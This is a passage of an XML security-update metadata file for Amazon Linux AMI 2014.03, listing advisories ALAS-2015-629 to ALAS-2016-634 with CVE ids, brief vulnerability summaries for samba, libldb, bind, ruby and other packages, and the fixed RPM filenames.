version="2.9.1" release="6.2.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-2.9.1-6.2.50.amzn1.x86_64.rpm</filename></package><package name="libxml2-python26" version="2.9.1" release="6.2.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python26-2.9.1-6.2.50.amzn1.x86_64.rpm</filename></package><package name="libxml2-devel" version="2.9.1" release="6.2.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-devel-2.9.1-6.2.50.amzn1.x86_64.rpm</filename></package><package name="libxml2" version="2.9.1" release="6.2.50.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-2.9.1-6.2.50.amzn1.i686.rpm</filename></package><package name="libxml2-debuginfo" version="2.9.1" release="6.2.50.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-debuginfo-2.9.1-6.2.50.amzn1.i686.rpm</filename></package><package name="libxml2-python26" version="2.9.1" release="6.2.50.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python26-2.9.1-6.2.50.amzn1.i686.rpm</filename></package><package name="libxml2-python27" version="2.9.1" release="6.2.50.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python27-2.9.1-6.2.50.amzn1.i686.rpm</filename></package><package name="libxml2-devel" version="2.9.1" release="6.2.50.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-devel-2.9.1-6.2.50.amzn1.i686.rpm</filename></package><package name="libxml2-static" version="2.9.1" release="6.2.50.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-static-2.9.1-6.2.50.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-629</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-629: medium priority package update for perl-HTML-Scrubber</title><issued date="2015-12-14 10:00:00" /><updated date="2015-12-13 14:25:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix 
the following vulnerabilities:
CVE-2015-5667:
Cross-site scripting (XSS) vulnerability in the HTML-Scrubber module before 0.15 for Perl, when the comment feature is enabled, allows remote attackers to inject arbitrary web script or HTML via a crafted comment.
1276646:
CVE-2015-5667 perl-HTML-Scrubber: XSS vulnerability when function "comment" is enabled
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5667" title="" id="CVE-2015-5667" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perl-HTML-Scrubber" version="0.15" release="1.5.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-HTML-Scrubber-0.15-1.5.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-630</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-630: important priority package update for python-pygments</title><issued date="2015-12-14 15:14:00" /><updated date="2015-12-14 15:14:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-8557:
CVE-2015-8557
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8557" title="" id="CVE-2015-8557" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python26-pygments" version="1.4" release="4.12.amzn1" epoch="0" arch="noarch"><filename>Packages/python26-pygments-1.4-4.12.amzn1.noarch.rpm</filename></package><package name="python27-pygments" version="1.4" release="4.12.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-pygments-1.4-4.12.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-631</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-631: critical priority package update for bind</title><issued date="2015-12-15 13:00:00" /><updated date="2015-12-16 20:25:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-8000:
Embargoed
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8000" title="" id="CVE-2015-8000" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:2655.html" title="" id="RHSA-2015:2655" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-utils" version="9.8.2" release="0.37.rc1.42.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.37.rc1.42.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.37.rc1.42.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.37.rc1.42.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.37.rc1.42.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.37.rc1.42.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.37.rc1.42.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.37.rc1.42.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.37.rc1.42.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.37.rc1.42.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.37.rc1.42.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.37.rc1.42.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.37.rc1.42.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.37.rc1.42.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.37.rc1.42.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.37.rc1.42.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.37.rc1.42.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.37.rc1.42.amzn1.i686.rpm</filename></package><package name="bind-sdb" 
version="9.8.2" release="0.37.rc1.42.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.37.rc1.42.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.37.rc1.42.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.37.rc1.42.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.37.rc1.42.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.37.rc1.42.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.37.rc1.42.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.37.rc1.42.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.37.rc1.42.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.37.rc1.42.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-632</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-632: low priority package update for ruby19 ruby20 ruby21 ruby22</title><issued date="2016-01-18 11:00:00" /><updated date="2016-01-18 11:00:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-7551:
1248935:
CVE-2009-5147 CVE-2015-7551 ruby: DL::dlopen could open a library with tainted library name
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7551" title="" id="CVE-2015-7551" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby22-devel" version="2.2.4" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby22-devel-2.2.4-1.8.amzn1.x86_64.rpm</filename></package><package name="ruby22-irb" version="2.2.4" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby22-irb-2.2.4-1.8.amzn1.noarch.rpm</filename></package><package name="ruby22-libs" version="2.2.4" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby22-libs-2.2.4-1.8.amzn1.x86_64.rpm</filename></package><package name="rubygem22-io-console" version="0.4.3" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem22-io-console-0.4.3-1.8.amzn1.x86_64.rpm</filename></package><package name="ruby22-debuginfo" version="2.2.4" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby22-debuginfo-2.2.4-1.8.amzn1.x86_64.rpm</filename></package><package name="rubygems22-devel" version="2.4.5.1" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems22-devel-2.4.5.1-1.8.amzn1.noarch.rpm</filename></package><package name="rubygem22-psych" version="2.0.8" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem22-psych-2.0.8-1.8.amzn1.x86_64.rpm</filename></package><package name="ruby22-doc" version="2.2.4" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby22-doc-2.2.4-1.8.amzn1.noarch.rpm</filename></package><package name="rubygems22" version="2.4.5.1" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems22-2.4.5.1-1.8.amzn1.noarch.rpm</filename></package><package name="rubygem22-bigdecimal" version="1.2.6" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem22-bigdecimal-1.2.6-1.8.amzn1.x86_64.rpm</filename></package><package name="ruby22" version="2.2.4" 
release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby22-2.2.4-1.8.amzn1.x86_64.rpm</filename></package><package name="rubygem22-psych" version="2.0.8" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem22-psych-2.0.8-1.8.amzn1.i686.rpm</filename></package><package name="ruby22-debuginfo" version="2.2.4" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/ruby22-debuginfo-2.2.4-1.8.amzn1.i686.rpm</filename></package><package name="ruby22" version="2.2.4" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/ruby22-2.2.4-1.8.amzn1.i686.rpm</filename></package><package name="rubygem22-io-console" version="0.4.3" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem22-io-console-0.4.3-1.8.amzn1.i686.rpm</filename></package><package name="ruby22-devel" version="2.2.4" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/ruby22-devel-2.2.4-1.8.amzn1.i686.rpm</filename></package><package name="ruby22-libs" version="2.2.4" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/ruby22-libs-2.2.4-1.8.amzn1.i686.rpm</filename></package><package name="rubygem22-bigdecimal" version="1.2.6" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem22-bigdecimal-1.2.6-1.8.amzn1.i686.rpm</filename></package><package name="rubygem21-bigdecimal" version="1.2.4" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-bigdecimal-1.2.4-1.19.amzn1.x86_64.rpm</filename></package><package name="ruby21-doc" version="2.1.8" release="1.19.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby21-doc-2.1.8-1.19.amzn1.noarch.rpm</filename></package><package name="ruby21-irb" version="2.1.8" release="1.19.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby21-irb-2.1.8-1.19.amzn1.noarch.rpm</filename></package><package name="rubygems21-devel" version="2.2.5" release="1.19.amzn1" epoch="0" 
arch="noarch"><filename>Packages/rubygems21-devel-2.2.5-1.19.amzn1.noarch.rpm</filename></package><package name="ruby21" version="2.1.8" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-2.1.8-1.19.amzn1.x86_64.rpm</filename></package><package name="rubygems21" version="2.2.5" release="1.19.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems21-2.2.5-1.19.amzn1.noarch.rpm</filename></package><package name="rubygem21-psych" version="2.0.5" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-psych-2.0.5-1.19.amzn1.x86_64.rpm</filename></package><package name="ruby21-debuginfo" version="2.1.8" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-debuginfo-2.1.8-1.19.amzn1.x86_64.rpm</filename></package><package name="ruby21-devel" version="2.1.8" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-devel-2.1.8-1.19.amzn1.x86_64.rpm</filename></package><package name="ruby21-libs" version="2.1.8" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-libs-2.1.8-1.19.amzn1.x86_64.rpm</filename></package><package name="rubygem21-io-console" version="0.4.3" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-io-console-0.4.3-1.19.amzn1.x86_64.rpm</filename></package><package name="ruby21-libs" version="2.1.8" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-libs-2.1.8-1.19.amzn1.i686.rpm</filename></package><package name="rubygem21-io-console" version="0.4.3" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-io-console-0.4.3-1.19.amzn1.i686.rpm</filename></package><package name="ruby21-devel" version="2.1.8" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-devel-2.1.8-1.19.amzn1.i686.rpm</filename></package><package name="ruby21-debuginfo" version="2.1.8" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-debuginfo-2.1.8-1.19.amzn1.i686.rpm</filename></package><package 
name="rubygem21-psych" version="2.0.5" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-psych-2.0.5-1.19.amzn1.i686.rpm</filename></package><package name="rubygem21-bigdecimal" version="1.2.4" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-bigdecimal-1.2.4-1.19.amzn1.i686.rpm</filename></package><package name="ruby21" version="2.1.8" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-2.1.8-1.19.amzn1.i686.rpm</filename></package><package name="rubygems19" version="1.8.23.2" release="32.70.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems19-1.8.23.2-32.70.amzn1.noarch.rpm</filename></package><package name="ruby19-devel" version="1.9.3.551" release="32.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-devel-1.9.3.551-32.70.amzn1.x86_64.rpm</filename></package><package name="rubygems19-devel" version="1.8.23.2" release="32.70.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems19-devel-1.8.23.2-32.70.amzn1.noarch.rpm</filename></package><package name="rubygem19-rake" version="0.9.2.2" release="32.70.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem19-rake-0.9.2.2-32.70.amzn1.noarch.rpm</filename></package><package name="ruby19-irb" version="1.9.3.551" release="32.70.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby19-irb-1.9.3.551-32.70.amzn1.noarch.rpm</filename></package><package name="rubygem19-bigdecimal" version="1.1.0" release="32.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem19-bigdecimal-1.1.0-32.70.amzn1.x86_64.rpm</filename></package><package name="ruby19-libs" version="1.9.3.551" release="32.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-libs-1.9.3.551-32.70.amzn1.x86_64.rpm</filename></package><package name="rubygem19-io-console" version="0.3" release="32.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem19-io-console-0.3-32.70.amzn1.x86_64.rpm</filename></package><package name="ruby19-doc" version="1.9.3.551" 
release="32.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-doc-1.9.3.551-32.70.amzn1.x86_64.rpm</filename></package><package name="ruby19-debuginfo" version="1.9.3.551" release="32.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-debuginfo-1.9.3.551-32.70.amzn1.x86_64.rpm</filename></package><package name="ruby19" version="1.9.3.551" release="32.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-1.9.3.551-32.70.amzn1.x86_64.rpm</filename></package><package name="rubygem19-minitest" version="2.5.1" release="32.70.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem19-minitest-2.5.1-32.70.amzn1.noarch.rpm</filename></package><package name="rubygem19-rdoc" version="3.9.5" release="32.70.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem19-rdoc-3.9.5-32.70.amzn1.noarch.rpm</filename></package><package name="rubygem19-json" version="1.5.5" release="32.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem19-json-1.5.5-32.70.amzn1.x86_64.rpm</filename></package><package name="rubygem19-io-console" version="0.3" release="32.70.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem19-io-console-0.3-32.70.amzn1.i686.rpm</filename></package><package name="ruby19-libs" version="1.9.3.551" release="32.70.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-libs-1.9.3.551-32.70.amzn1.i686.rpm</filename></package><package name="rubygem19-bigdecimal" version="1.1.0" release="32.70.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem19-bigdecimal-1.1.0-32.70.amzn1.i686.rpm</filename></package><package name="ruby19-devel" version="1.9.3.551" release="32.70.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-devel-1.9.3.551-32.70.amzn1.i686.rpm</filename></package><package name="ruby19" version="1.9.3.551" release="32.70.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-1.9.3.551-32.70.amzn1.i686.rpm</filename></package><package name="ruby19-doc" version="1.9.3.551" release="32.70.amzn1" epoch="0" 
arch="i686"><filename>Packages/ruby19-doc-1.9.3.551-32.70.amzn1.i686.rpm</filename></package><package name="rubygem19-json" version="1.5.5" release="32.70.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem19-json-1.5.5-32.70.amzn1.i686.rpm</filename></package><package name="ruby19-debuginfo" version="1.9.3.551" release="32.70.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-debuginfo-1.9.3.551-32.70.amzn1.i686.rpm</filename></package><package name="ruby20-debuginfo" version="2.0.0.648" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-debuginfo-2.0.0.648-1.29.amzn1.x86_64.rpm</filename></package><package name="rubygems20" version="2.0.14.1" release="1.29.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems20-2.0.14.1-1.29.amzn1.noarch.rpm</filename></package><package name="rubygem20-bigdecimal" version="1.2.0" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-bigdecimal-1.2.0-1.29.amzn1.x86_64.rpm</filename></package><package name="ruby20" version="2.0.0.648" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-2.0.0.648-1.29.amzn1.x86_64.rpm</filename></package><package name="ruby20-libs" version="2.0.0.648" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-libs-2.0.0.648-1.29.amzn1.x86_64.rpm</filename></package><package name="ruby20-doc" version="2.0.0.648" release="1.29.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby20-doc-2.0.0.648-1.29.amzn1.noarch.rpm</filename></package><package name="rubygem20-psych" version="2.0.0" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-psych-2.0.0-1.29.amzn1.x86_64.rpm</filename></package><package name="ruby20-devel" version="2.0.0.648" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-devel-2.0.0.648-1.29.amzn1.x86_64.rpm</filename></package><package name="rubygem20-io-console" version="0.4.2" release="1.29.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/rubygem20-io-console-0.4.2-1.29.amzn1.x86_64.rpm</filename></package><package name="rubygems20-devel" version="2.0.14.1" release="1.29.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems20-devel-2.0.14.1-1.29.amzn1.noarch.rpm</filename></package><package name="ruby20-irb" version="2.0.0.648" release="1.29.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby20-irb-2.0.0.648-1.29.amzn1.noarch.rpm</filename></package><package name="ruby20" version="2.0.0.648" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-2.0.0.648-1.29.amzn1.i686.rpm</filename></package><package name="rubygem20-io-console" version="0.4.2" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-io-console-0.4.2-1.29.amzn1.i686.rpm</filename></package><package name="ruby20-libs" version="2.0.0.648" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-libs-2.0.0.648-1.29.amzn1.i686.rpm</filename></package><package name="ruby20-debuginfo" version="2.0.0.648" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-debuginfo-2.0.0.648-1.29.amzn1.i686.rpm</filename></package><package name="rubygem20-bigdecimal" version="1.2.0" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-bigdecimal-1.2.0-1.29.amzn1.i686.rpm</filename></package><package name="ruby20-devel" version="2.0.0.648" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-devel-2.0.0.648-1.29.amzn1.i686.rpm</filename></package><package name="rubygem20-psych" version="2.0.0" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-psych-2.0.0-1.29.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-633</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-633: medium priority package update for libldb</title><issued date="2016-01-18 11:00:00" 
/><updated date="2016-01-18 11:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-5330:
A memory-read flaw was found in the way the libldb library processed LDB DN records with a null byte. An authenticated, remote attacker could use this flaw to read heap-memory pages from the server.
1281326:
CVE-2015-5330 samba, libldb: remote memory read in the Samba LDAP server
CVE-2015-3223:
A denial of service flaw was found in the ldb_wildcard_compare() function of libldb. A remote attacker could send a specially crafted packet that, when processed by an application using libldb (for example the AD LDAP server in Samba), would cause that application to consume an excessive amount of memory and crash.
1290287:
CVE-2015-3223 libldb: Remote DoS in Samba (AD) LDAP server
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3223" title="" id="CVE-2015-3223" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5330" title="" id="CVE-2015-5330" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="pyldb" version="1.1.20" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/pyldb-1.1.20-1.7.amzn1.x86_64.rpm</filename></package><package name="ldb-tools" version="1.1.20" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/ldb-tools-1.1.20-1.7.amzn1.x86_64.rpm</filename></package><package name="libldb" version="1.1.20" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libldb-1.1.20-1.7.amzn1.x86_64.rpm</filename></package><package name="pyldb-devel" version="1.1.20" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/pyldb-devel-1.1.20-1.7.amzn1.x86_64.rpm</filename></package><package name="libldb-debuginfo" version="1.1.20" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libldb-debuginfo-1.1.20-1.7.amzn1.x86_64.rpm</filename></package><package name="libldb-devel" version="1.1.20" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libldb-devel-1.1.20-1.7.amzn1.x86_64.rpm</filename></package><package name="pyldb" version="1.1.20" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/pyldb-1.1.20-1.7.amzn1.i686.rpm</filename></package><package name="pyldb-devel" version="1.1.20" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/pyldb-devel-1.1.20-1.7.amzn1.i686.rpm</filename></package><package name="libldb-devel" version="1.1.20" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/libldb-devel-1.1.20-1.7.amzn1.i686.rpm</filename></package><package name="libldb-debuginfo" version="1.1.20" release="1.7.amzn1" epoch="0" 
arch="i686"><filename>Packages/libldb-debuginfo-1.1.20-1.7.amzn1.i686.rpm</filename></package><package name="ldb-tools" version="1.1.20" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/ldb-tools-1.1.20-1.7.amzn1.i686.rpm</filename></package><package name="libldb" version="1.1.20" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/libldb-1.1.20-1.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-634</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-634: medium priority package update for samba</title><issued date="2016-01-18 11:00:00" /><updated date="2016-01-18 11:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-5330:
A memory-read flaw was found in the way the libldb library processed LDB DN records with a null byte. An authenticated, remote attacker could use this flaw to read heap-memory pages from the server.
1281326:
CVE-2015-5330 samba, libldb: remote memory read in the Samba LDAP server
CVE-2015-5299:
A missing access control flaw was found in Samba. A remote, authenticated attacker could use this flaw to view the current snapshot on a Samba share, despite not having DIRECTORY_LIST access rights.
1276126:
CVE-2015-5299 Samba: Missing access control check in shadow copy code
CVE-2015-5296:
A man-in-the-middle vulnerability was found in the way &quot;connection signing&quot; was implemented by Samba. A remote attacker could use this flaw to downgrade an existing Samba client connection and force the use of plain text.
1290292:
CVE-2015-5296 samba: client requesting encryption vulnerable to downgrade attack
CVE-2015-5252:
An access flaw was found in the way Samba verified symbolic links when creating new files on a Samba share. A remote attacker could exploit this flaw to gain access to files outside of Samba&#039;s share path.
1290288:
CVE-2015-5252 samba: Insufficient symlink verification in smbd
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5252" title="" id="CVE-2015-5252" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5296" title="" id="CVE-2015-5296" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5299" title="" id="CVE-2015-5299" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5330" title="" id="CVE-2015-5330" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="samba-libs" version="4.2.3" release="11.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-libs-4.2.3-11.28.amzn1.x86_64.rpm</filename></package><package name="libsmbclient" version="4.2.3" release="11.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-4.2.3-11.28.amzn1.x86_64.rpm</filename></package><package name="samba-pidl" version="4.2.3" release="11.28.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-pidl-4.2.3-11.28.amzn1.noarch.rpm</filename></package><package name="samba-winbind" version="4.2.3" release="11.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-4.2.3-11.28.amzn1.x86_64.rpm</filename></package><package name="samba-test-libs" version="4.2.3" release="11.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-libs-4.2.3-11.28.amzn1.x86_64.rpm</filename></package><package name="samba-common-libs" version="4.2.3" release="11.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-libs-4.2.3-11.28.amzn1.x86_64.rpm</filename></package><package name="samba" version="4.2.3" release="11.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-4.2.3-11.28.amzn1.x86_64.rpm</filename></package><package name="samba-debuginfo" version="4.2.3" release="11.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-debuginfo-4.2.3-11.28.amzn1.x86_64.rpm</filename></package><package name="samba-devel" 
version="4.2.3" release="11.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-devel-4.2.3-11.28.amzn1.x86_64.rpm</filename></package><package name="ctdb-devel" version="4.2.3" release="11.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-devel-4.2.3-11.28.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-modules" version="4.2.3" release="11.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-modules-4.2.3-11.28.amzn1.x86_64.rpm</filename></package><package name="samba-client" version="4.2.3" release="11.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-4.2.3-11.28.amzn1.x86_64.rpm</filename></package><package name="ctdb-tests" version="4.2.3" release="11.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-tests-4.2.3-11.28.amzn1.x86_64.rpm</filename></package><package name="samba-common-tools" version="4.2.3" release="11.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-tools-4.2.3-11.28.amzn1.x86_64.rpm</filename></package><package name="ctdb" version="4.2.3" release="11.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-4.2.3-11.28.amzn1.x86_64.rpm</filename></package><package name="samba-python" version="4.2.3" release="11.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-python-4.2.3-11.28.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.2.3" release="11.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-krb5-locator-4.2.3-11.28.amzn1.x86_64.rpm</filename></package><package name="samba-test-devel" version="4.2.3" release="11.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-devel-4.2.3-11.28.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-clients" version="4.2.3" release="11.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-clients-4.2.3-11.28.amzn1.x86_64.rpm</filename></package><package 